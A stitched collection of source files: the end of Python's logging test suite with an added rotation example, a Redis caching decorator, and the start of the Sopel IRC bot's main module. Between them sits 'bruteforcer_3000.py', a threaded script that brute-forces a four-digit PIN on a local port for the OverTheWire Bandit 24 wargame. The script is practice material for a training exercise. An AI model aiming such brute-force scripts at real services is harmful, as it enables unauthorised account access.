self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
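        # stacklevel=1 attributes the record to the code calling warning()
        # (innermost); each increment skips one more frame up the call chain,
        # so funcName moves to inner, outer and finally this test method.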
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
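        # 'message', 'asctime' and every attribute already present on a
        # LogRecord are reserved; supplying them via 'extra' must raise KeyError.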
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
        # If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
        # Check that the log file is created and assume it was created by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
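
# Editor's note: the namer/rotator tests above exercise the public hooks that
# RotatingFileHandler exposes for customising rollover. Below is a minimal,
# illustrative sketch of how those hooks are typically wired up outside the
# test suite; the file name, size limit and compression level are arbitrary
# choices, and the function is never called by these tests.
def _example_compressed_rotation(logfile='app.log'):
    import logging.handlers
    import os
    import zlib

    def namer(name):
        # Rotated files get a ".gz" suffix, e.g. app.log.1.gz
        return name + '.gz'

    def rotator(source, dest):
        # Compress the just-closed log file into its destination name.
        # zlib.compress mirrors test_rotator above; a real deployment might
        # prefer the gzip module so the rotated files are gzip-readable.
        with open(source, 'rb') as sf:
            data = sf.read()
        with open(dest, 'wb') as df:
            df.write(zlib.compress(data, 9))
        os.remove(source)

    handler = logging.handlers.RotatingFileHandler(
        logfile, maxBytes=1024 * 1024, backupCount=5)
    handler.namer = namer
    handler.rotator = rotator
    return handler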
|
bruteforcer_3000.py
|
#!/bin/python3
#Script to win overthewire bandit 24 challenge
import threading
import socket
import os
from time import sleep
HOST = "127.0.0.1"
PORT = 30002
BUFFERSIZE = 2048
PASS = "" # Input password for user
#Types 0 - Normal, 1 - Warning, 2 - Success
def outputMessage(msg, type):
if (type == 1):
print("[!] " + msg)
elif (type == 2):
print("[*] " + msg)
else:
print("[+] " + msg)
#Brute Force Thread >:3
def bruteForce(startIndex, id):
global HOST, PORT, BUFFERSIZE, PASS
outputMessage("THREAD " + str(id) + " ACTIVE", 0)
threadSocket = socket.socket()
threadSocket.connect((HOST, PORT))
    #Allow for initial message fluff
threadSocket.recv(BUFFERSIZE)
for i in range(1000):
PIN = startIndex + i
#outputMessage(str(id) + ":" + str(PIN) , 0)
threadSocket.send((PASS + " " + str(PIN) + "\n").encode())
response = threadSocket.recv(BUFFERSIZE).decode()
if ("Try again." in response):
if ((i % 100) == 0):
outputMessage("Progress: " + str(i), 0)
else:
outputMessage("PIN FOUND :)", 2)
outputMessage(str(PIN), 2)
outputMessage(response, 2)
            os._exit(0)  # exit() would only end this worker thread; os._exit stops the whole process
outputMessage("THREAD " + str(id) + " END", 0)
############
### MAIN ###
############
outputMessage("Starting Bruteforce Software...", 0)
#Spawn Threads
outputMessage("Spawning Threads...", 0)
outputMessage("Happy Hunting :)", 0)
for i in range(10):
thread = threading.Thread(target=bruteForce, args=((i * 1000), i,))
thread.start()
    thread.join() #Joining inside the loop runs the workers one at a time - Bandit doesn't allow concurrent connections (see the sketch below)
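
# Editor's note: joining each thread inside the loop above makes the workers
# run one at a time, which the author notes is deliberate because the target
# host refuses concurrent connections. If concurrency were allowed, the usual
# pattern is sketched below (illustrative only, never called): start every
# thread first, share a threading.Event so workers stop once the PIN is found,
# and join them all afterwards.
def spawnConcurrentWorkers(workerCount=10, pinsPerWorker=1000):
    found = threading.Event()

    def worker(startIndex, id):
        for i in range(pinsPerWorker):
            if found.is_set():
                return  # another worker already found the PIN
            # ... probe startIndex + i over the socket as in bruteForce(),
            # and call found.set() when the server accepts the PIN
        outputMessage("THREAD " + str(id) + " END", 0)

    workers = [threading.Thread(target=worker, args=(i * pinsPerWorker, i))
               for i in range(workerCount)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()  # join only after every worker has been started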
|
cache.py
|
# cache.py
# A minimalist caching decorator which json serializes the output of functions
import json
import time
import threading
from functools import wraps
from inspect import getcallargs
class CacheNameClashException(Exception):
pass
# Although it might make more sense to track name clashes per cache,
# create_cache could plausibly be called twice on the same connection,
# so a single global registry is the safer guard against accidental
# reuse of a function name.
decorated = {}
def mangle(fname, f, args, kwargs):
# We uniquely identify functions by their list of arguments
# as resolved by the function definition.
return "@" + fname + "_" + json.dumps(getcallargs(f, *args, **kwargs))
def create_cache(cache_store, prefix=""):
"""
Creates a caching decorator that connects to the given Redis client
(or any object similarly supporting get(), set() and lock())
`cache_store` -- An object supporting get(), set(), and lock()
    `prefix` -- a prefix prepended to the cache keys of the functions decorated
    by the returned decorator. This prevents key clashes between identically-named
    functions decorated through different `create_cache` calls
Returns -- cache decorator function
"""
def cache(expires=5, prefix=prefix, bg_caching=False, stale=None):
"""
        Decorator for any function that takes JSON-serializable arguments and returns
        JSON-serializable output; it caches the result for the given arguments in the
        given cache store.
`expires` -- How long to return cached results before calling the underlying function again.
Defaults to 5 seconds, since permanent caching is rarely what is actually desired.
`prefix` -- A prefix appended to the cache keys of the decorated function
`bg_caching` -- Whether to return cached results while results are updated from the underlying function
in a background thread
`stale` -- How long old results can be returned when bg_caching is True, so that two calls don't
try to update the cache in the background. Defaults to 2 * expires
"""
if not stale:
stale = 2 * expires
def decorate(f):
fname = prefix + "_" + f.__module__ + "_" + f.__name__
# Prevent two functions in the same program with the same name from
# accidentally stepping on each others' cache.
if decorated.get(fname):
raise CacheNameClashException("A function with the name " + f.__name__ + " has already been cached elsewhere in this module. Please add a prefix to these functions to uniquely identify them")
decorated[fname] = True
def update_cache(f, lock, *args, **kwargs):
try:
result = f(*args, **kwargs)
cache_store.set(mangle(fname, f, args, kwargs), json.dumps({'timestamp': time.time(), 'result': result}))
return result
finally:
lock.release()
@wraps(f)
def wrapped(*args, **kwargs):
cached_result = cache_store.get(mangle(fname, f, args, kwargs))
try:
cached_result = json.loads(cached_result)
                except (TypeError, ValueError):
cached_result = {}
now = time.time()
age = now - cached_result.get('timestamp', 0) if cached_result else now
if not cached_result or age > expires:
# Have to use try-finally instead of with, since the implementation of __enter__
# in redis.lock.Lock automatically blocks https://github.com/andymccurdy/redis-py/blob/master/redis/lock.py
# We don't want thread-local storage because we want to release our lock from the
# background thread
lock = cache_store.lock('__lock_' + fname, timeout=expires, blocking_timeout=0.1, thread_local=False)
if lock.acquire():
if bg_caching and cached_result and now - cached_result['timestamp'] < stale:
# Update redis in the bg, and return the already-cached result, if we already have something
# in the cache and it's still valid.
try:
# update_cache releases the lock when it's done
threading.Thread(target=update_cache, args=(f, lock) + args, kwargs=kwargs).start()
except Exception as e:
lock.release()
raise e
else:
# Otherwise update the cache and return the result of the function in this thread
return update_cache(f, lock, *args, **kwargs)
else:
                        # Couldn't get the lock; fall back to calling the underlying function directly
if not bg_caching or not cached_result:
return f(*args, **kwargs)
return cached_result['result']
return wrapped
return decorate
return cache
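
# Editor's note: a minimal usage sketch, assuming the `redis` package is
# installed and a Redis server is reachable (host/port below are placeholders).
# redis.Redis provides the get()/set()/lock() interface this module expects.
# The function is illustrative only and is not called anywhere.
def _example_usage():
    import redis  # assumption: redis-py is available

    cache = create_cache(redis.Redis(host='localhost', port=6379), prefix='demo')

    @cache(expires=10, bg_caching=True)
    def slow_lookup(user_id):
        # stand-in for an expensive call returning a JSON-serializable value
        return {'user': user_id}

    return slow_lookup(42)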
|
bot.py
|
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import inspect
import itertools
import logging
import re
import signal
import threading
import time
from typing import Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
import sopel.loader
from sopel.plugin import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
QUIT_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
if hasattr(signal, name)
]
RESTART_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR2', 'SIGILL']
if hasattr(signal, name)
]
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super().__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
self._plugins = {}
self._rules_manager = plugin_rules.Manager()
self._scheduler = plugin_jobs.Scheduler(self)
self._url_callbacks = tools.SopelMemory()
"""Tracking of manually registered URL callbacks.
Should be manipulated only by use of :meth:`register_url_callback` and
:meth:`unregister_url_callback` methods, which are deprecated.
Remove in Sopel 9, along with the above related methods.
"""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
        For servers that do not support IRCv3, this will be an empty dict.
"""
self.channels = tools.SopelIdentifierMemory()
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelIdentifierMemory()
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
@property
def rules(self):
"""Rules manager."""
return self._rules_manager
@property
def scheduler(self):
"""Job Scheduler. See :func:`sopel.plugin.interval`."""
return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
            at least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
to setup signals. If the bot is connected, upon receiving a signal it
